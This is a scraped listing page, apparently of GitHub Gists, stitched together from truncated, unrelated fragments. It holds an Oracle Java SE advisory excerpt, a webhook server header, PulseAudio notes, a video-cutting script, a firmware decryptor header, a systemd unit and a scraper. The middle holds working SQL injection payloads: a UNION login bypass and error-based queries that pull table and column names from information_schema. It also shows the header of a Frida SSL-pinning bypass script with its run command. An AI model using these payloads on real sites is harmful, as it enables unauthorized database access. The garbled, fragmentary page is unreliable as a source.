Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie
Control Flow Guard is a security mitigation that verifies the target address of indirect calls. It works by having the compiler insert a check at indirect call sites to verify the validity of the call target, and also the linker write the necessary data and flags into the PE/COFF image to enable the feature on Windows' end.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Net; | |
using System.Text; | |
using System.Threading.Tasks; | |
using HttpMultipartParser; | |
namespace WebhookReceiver | |
{ | |
internal class HttpServer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Credits | |
# https://c-nergy.be/blog/?p=13655 | |
# https://askubuntu.com/questions/844245/how-to-compile-latest-pulseaudio-with-webrtc-in-ubuntu-16-04 | |
# https://askubuntu.com/questions/496549/error-you-must-put-some-source-uris-in-your-sources-list | |
# https://unix.stackexchange.com/questions/65167/enable-udev-and-speex-support-for-pulseaudio | |
# https://rudd-o.com/linux-and-free-software/how-to-make-pulseaudio-run-once-at-boot-for-all-your-users | |
# https://gist.github.com/rkttu/35ecab5604c9ddc356b0af4644d5a226 | |
# Installation and Enhanced session | |
# follow steps on the post below, I installed Ubuntu 22.04 on a Windows 11 machine |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/bash | |
# | |
# Cut a fragment of a video with the minimal possible re-encoding. | |
# If the new start point is not a key frame it reencodes the video | |
# from that point until the frame before a new keyframe. The remaining | |
# part is copied as passthrough and both fragments are concatenated | |
# | |
# In order to make the video streams compatible we use the same codec | |
# and bitrate. This works fine with h264. No idea about other codecs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
username=' UNION SELECT "butters" as password FROM admins WHERE '1' = '1 | |
password=butters | |
username=foo' OR (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
shows table name admin | |
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
gives id row | |
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
gives username row |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Android ssl certificate pinning bypass script for various methods | |
by Maurizio Siddu | |
Run with: | |
frida -U -f <APP_ID> -l frida_multiple_unpinning.js [--no-pause] | |
*/ | |
setTimeout(function() { | |
Java.perform(function() { | |
console.log(''); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import os, sys | |
import argparse | |
import struct | |
from functools import reduce | |
""" | |
QNAP QTS firmware encryptor/decryptor. | |
Based on https://pastebin.com/KHbX85nG |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# How to create systemd services: http://neilwebber.com/notes/2016/02/10/making-a-simple-systemd-file-for-raspberry-pi-jessie/ | |
# Digital ocean on a mongodb service: https://www.digitalocean.com/community/tutorials/how-to-install-mongodb-on-ubuntu-16-04 | |
[Unit] | |
Description=Run SystemD as users | |
After=network.target | |
[Service] | |
Type=simple | |
User=[USER HERE] | |
WorkingDirectory=[USER HOME] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from bs4 import BeautifulSoup | |
import re | |
for a in xrange(1,5): | |
for b in xrange(1,21): | |
path="html/"+str(a)+"_"+str(b)+".html" | |
soup = BeautifulSoup(open(path),"lxml") | |
span=soup.find_all(id=re.compile("Label")) | |
for i in span: | |
#print i.get("id") |
NewerOlder